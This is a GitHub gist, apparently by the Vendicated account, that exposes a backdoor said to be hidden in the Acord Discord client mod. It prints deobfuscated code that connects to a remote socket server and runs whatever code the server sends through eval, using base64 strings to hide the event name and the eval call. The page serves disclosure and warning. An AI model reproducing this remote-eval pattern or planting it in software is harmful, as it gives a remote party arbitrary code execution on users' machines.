Last active
October 8, 2024 16:19
-
-
Save Vendicated/fef37323939e930b52a0e5ec379052bc to your computer and use it in GitHub Desktop.
Acord Eval Backdoor
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // This code can be found in Acord's code in an obfuscated form. Just search for the socket url or one of the atob strings and you will | |
| // find it. | |
| // Permament Link to their Repo (they might delete this): | |
| // https://github.com/AcordPlugin/releases/blob/4944d811f1c5e228c219d4966c5436bdfc6639d3/fixture/extension.js | |
| // Permament Link (fork): | |
| // https://github.com/Vendicated/acord-is-malware/blob/main/fixture/extension.js | |
| // Archive Link: | |
| // https://web.archive.org/web/20230115234723/https://github.com/AcordPlugin/releases/blob/4944d811f1c5e228c219d4966c5436bdfc6639d3/fixture/extension.js | |
| const connection = socketIo.connect("https://socket.acord.app/", { autoConnect: !1, reconnection: !0, transports: ["websocket"] }); | |
| connection.on(atob("OmV2YWx1YXRl") /* :evaluate */, async (code, callback) => { | |
| try { | |
| let data = await window[atob("ZXZhbA==") /* eval */](code); | |
| callback({ ok: true, data: data }); | |
| } catch (t) { | |
| callback({ ok: false, error: `${t}` }); | |
| } | |
| }); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
It seems that link you have mentioned in this gist has been deleted. However, after doing some digging I have located a potential updated source link organization:
https://github.com/acord-standalone